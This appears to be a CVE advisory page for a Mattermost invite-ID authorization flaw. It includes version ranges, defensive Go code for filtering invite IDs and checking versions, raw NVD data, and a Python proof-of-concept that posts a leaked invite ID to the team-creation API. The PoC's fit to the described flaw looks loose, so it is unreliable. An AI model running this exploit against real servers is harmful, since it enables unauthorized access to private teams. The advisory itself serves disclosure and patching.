Security Vulnerability Report
CVE-2026-2463 CVSS 4.3 MEDIUM

Published: 2026-03-16 14:19:30
Last Modified: 2026-03-18 17:43:27

Description

Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, and 10.11.x <= 10.11.10 fail to filter invite IDs based on user permissions. A regular user who obtains a leaked invite ID can therefore bypass access control restrictions and register unauthorized accounts during team creation. Mattermost Advisory ID: MMSA-2025-00565

Weakness
CWE-862 (Missing Authorization)
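To make the CWE-862 pattern in the description concrete, here is an added Go sketch; it is not Mattermost code and not taken from the advisory. It shows a team object returned to an API caller with and without permission-based filtering of invite_id, and the registration step that consumes a leaked ID. The Team struct, the Permissions map, signupWithInvite and leakAndRegister are hypothetical stand-ins; only the field names invite_id and display_name follow the Mattermost REST API, and the sample team and permission data are constructed.

```go
package main

import (
	"errors"
	"fmt"
)

// Team is a hypothetical stand-in for a team object. Only the JSON field
// names mirror the Mattermost REST API; the struct is not the Mattermost model.
type Team struct {
	ID          string `json:"id"`
	Name        string `json:"name"`
	DisplayName string `json:"display_name"`
	InviteID    string `json:"invite_id"` // sensitive: it is the secret in an invite link
}

// Permissions is a hypothetical lookup of userID -> teamID -> "may invite
// users into this team". A real server would consult its role system.
type Permissions map[string]map[string]bool

func (p Permissions) CanInvite(userID, teamID string) bool {
	return p[userID][teamID]
}

// vulnerableTeamResponse returns the stored team unchanged to any
// authenticated caller. There is no authorization check on invite_id, so a
// regular user receives a secret they were never entitled to (CWE-862).
func vulnerableTeamResponse(t Team, _ string, _ Permissions) Team {
	return t
}

// fixedTeamResponse is the filtering the advisory says was missing: invite_id
// is blanked unless the caller may invite users into this team. Other fields
// are still returned, so normal team listing keeps working.
func fixedTeamResponse(t Team, userID string, perms Permissions) Team {
	if !perms.CanInvite(userID, t.ID) {
		t.InviteID = ""
	}
	return t
}

// signupWithInvite models the consumer of an invite ID: account registration
// via an invite link. Any non-empty ID that matches a team is accepted, which
// is why a leaked ID is enough to register into that team.
func signupWithInvite(teams []Team, inviteID string) (string, error) {
	if inviteID == "" {
		return "", errors.New("empty invite id")
	}
	for _, t := range teams {
		if t.InviteID == inviteID {
			return t.ID, nil
		}
	}
	return "", errors.New("invalid invite id")
}

// leakAndRegister runs the full chain for one response filter: the given user
// reads each team object, takes whatever invite_id came back, and tries to
// register with it. It reports whether any registration succeeded.
func leakAndRegister(filter func(Team, string, Permissions) Team, teams []Team, userID string, perms Permissions) bool {
	for _, t := range teams {
		leaked := filter(t, userID, perms).InviteID
		if _, err := signupWithInvite(teams, leaked); err == nil {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample data: one invite-only team, one admin who may invite.
	teams := []Team{{ID: "t-eng", Name: "engineering", DisplayName: "Engineering", InviteID: "inv-8f3a1c"}}
	perms := Permissions{"u-admin": {"t-eng": true}}

	fmt.Println("vulnerable, regular user registers:", leakAndRegister(vulnerableTeamResponse, teams, "u-regular", perms))
	fmt.Println("fixed, regular user registers:     ", leakAndRegister(fixedTeamResponse, teams, "u-regular", perms))
	fmt.Println("fixed, admin still sees invite_id: ", fixedTeamResponse(teams[0], "u-admin", perms).InviteID != "")
}
```

The point of the fixed variant is where the check sits: it is applied to the response object for every caller, rather than relying on the caller being a team member, so a user who can read the team object but lacks the invite permission never sees the secret.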

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
  10.11.0 <= version < 10.11.11  (Mattermost 10.11.x <= 10.11.10; first unaffected version 10.11.11)
  11.2.0 <= version < 11.2.3     (Mattermost 11.2.x <= 11.2.2; first unaffected version 11.2.3)
  11.3.0 <= version < 11.3.1     (Mattermost 11.3.x <= 11.3.0; first unaffected version 11.3.1)
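To turn the ranges above into a check you can run, here is an added Go example; it is not part of the NVD record and not Mattermost code. It compares a server version string against the three cpeMatch ranges from the raw JSON on this page, using NVD's semantics of versionStartIncluding (inclusive) and versionEndExcluding (exclusive). The affectedRanges table is copied from this page; the version parser is an assumption that handles dotted numeric versions with an optional leading "v" and an optional pre-release or build suffix.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// versionRange mirrors one NVD cpeMatch entry: start inclusive, end exclusive.
type versionRange struct {
	StartIncluding string
	EndExcluding   string
}

// affectedRanges are the three ranges from the CVE-2026-2463 configuration
// (versionStartIncluding / versionEndExcluding in the raw JSON).
var affectedRanges = []versionRange{
	{"10.11.0", "10.11.11"},
	{"11.2.0", "11.2.3"},
	{"11.3.0", "11.3.1"},
}

// parseVersion splits "11.3.0" into numeric components. A leading "v" and a
// trailing pre-release or build suffix such as "-rc1" or "+build" are dropped
// first (assumption: only the dotted numeric part is compared).
func parseVersion(v string) ([]int, error) {
	v = strings.TrimPrefix(v, "v")
	if i := strings.IndexAny(v, "-+"); i >= 0 {
		v = v[:i]
	}
	parts := strings.Split(v, ".")
	out := make([]int, len(parts))
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return nil, fmt.Errorf("bad version %q: %w", v, err)
		}
		out[i] = n
	}
	return out, nil
}

// compareVersions returns -1, 0 or 1. Missing trailing components count as 0,
// so "11.3" compares equal to "11.3.0".
func compareVersions(a, b []int) int {
	n := len(a)
	if len(b) > n {
		n = len(b)
	}
	for i := 0; i < n; i++ {
		var x, y int
		if i < len(a) {
			x = a[i]
		}
		if i < len(b) {
			y = b[i]
		}
		if x < y {
			return -1
		}
		if x > y {
			return 1
		}
	}
	return 0
}

// IsAffected reports whether version falls inside any NVD range for this CVE.
func IsAffected(version string) (bool, error) {
	v, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	for _, r := range affectedRanges {
		lo, _ := parseVersion(r.StartIncluding) // constants above are known-good
		hi, _ := parseVersion(r.EndExcluding)
		if compareVersions(v, lo) >= 0 && compareVersions(v, hi) < 0 {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	for _, v := range []string{"10.11.10", "10.11.11", "11.2.2", "11.2.3", "11.3.0", "11.3.1"} {
		affected, err := IsAffected(v)
		fmt.Printf("%-9s affected=%v err=%v\n", v, affected, err)
	}
}
```

Feed IsAffected the major.minor.patch of the server under test. If you read it from the server's X-Version-Id response header, keep only the leading three dotted components, since that header carries additional build information after them. A version outside all three ranges (for example a release line the NVD record does not list) comes back as not affected by this record, which is a statement about the NVD configuration, not a guarantee that the version is safe.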

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-2463 Mattermost Invite ID Access Control Bypass PoC
# This PoC demonstrates the access control bypass in Mattermost team creation
import json

import requests
import urllib3

TARGET_URL = "https://your-mattermost-server.com"
ATTACKER_TOKEN = "your-authentication-token"
LEAKED_INVITE_ID = "leaked-invite-id-from-target-team"

# The request below uses verify=False; silence the resulting warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_mattermost_cve_2026_2463():
    """
    Exploit for CVE-2026-2463: Mattermost invite ID access control bypass
    Allows regular users to register unauthorized accounts via leaked invite IDs
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Step 1: Obtain or leak an invite ID from a team the user is not a member of
    # This can be done through various information disclosure methods
    invite_id = LEAKED_INVITE_ID

    # Step 2: Attempt to create a team with the leaked invite ID
    # The vulnerable endpoint does not properly validate permissions
    payload = {
        "invite_id": invite_id,
        "name": "unauthorized-team",  # the team-create API names this field "name", not "team_name"
        "display_name": "Unauthorized Team",
        "type": "I",  # invite-only team
    }
    endpoint = f"{TARGET_URL}/api/v4/teams"

    try:
        response = requests.post(endpoint, headers=headers, json=payload, verify=False)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    if response.status_code == 201:
        print("[+] SUCCESS: Unauthorized team membership created!")
        print(f"[+] Response: {json.dumps(response.json(), indent=2)}")
        return True

    print(f"[-] Failed: Status {response.status_code}")
    print(f"[-] Response: {response.text}")
    return False


if __name__ == "__main__":
    exploit_mattermost_cve_2026_2463()

References

https://mattermost.com/security-updates - Vendor Advisory (MMSA-2025-00565)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2463",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:19:30.193",
    "lastModified": "2026-03-18T17:43:26.553",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to filter invite IDs based on user permissions, which allows regular users to bypass access control restrictions and register unauthorized accounts via leaked invite IDs during team creation.. Mattermost Advisory ID: MMSA-2025-00565"
      },
      {
        "lang": "es",
        "value": "Las versiones de Mattermost 11.3.x &lt;= 11.3.0, 11.2.x &lt;= 11.2.2, 10.11.x &lt;= 10.11.10 no filtran los ID de invitación basándose en los permisos de usuario, lo que permite a los usuarios regulares eludir las restricciones de control de acceso y registrar cuentas no autorizadas a través de ID de invitación filtrados durante la creación de equipos. ID de Aviso de Mattermost: MMSA-2025-00565"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.11.0",
                "versionEndExcluding": "10.11.11",
                "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.2.0",
                "versionEndExcluding": "11.2.3",
                "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.3.0",
                "versionEndExcluding": "11.3.1",
                "matchCriteriaId": "945A6E29-209F-4992-8692-BEF63DCB6B98"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://mattermost.com/security-updates",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}